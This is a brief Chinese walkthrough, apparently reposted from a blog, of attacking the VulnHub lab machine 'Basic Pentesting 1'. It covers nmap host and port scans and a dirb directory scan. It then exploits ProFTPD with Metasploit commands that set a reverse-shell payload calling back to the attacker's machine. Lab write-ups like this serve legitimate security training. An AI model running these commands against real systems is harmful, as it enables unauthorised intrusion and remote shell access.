vulnhub靶机:Basic penetration_1
项目地址
https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova
开启靶机虚拟机
使用nmap进行主机发现,获取靶机IP地址
nmap 192.168.47.1-254
根据对比可知Basic penetration:1的一个ip地址为192.168.47.168
扫描Basic penetration:1的操作系统,端口及对应服务
nmap -A -p- 192.168.47.168
发现该靶机开放了21,22,80端口
目录扫描
dirb http://192.168.47.168
信息收集
访问网站
发现是apache框架
提权
msfconsole
search ProFTPD
use 5
show options
set rhosts 192.168.47.168
set payload cmd/unix/reverse
set lhost 192.168.47.129
run
查看当前用户
提权成功
原文地址:https://blog.csdn.net/weixin_68416970/article/details/142764710
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!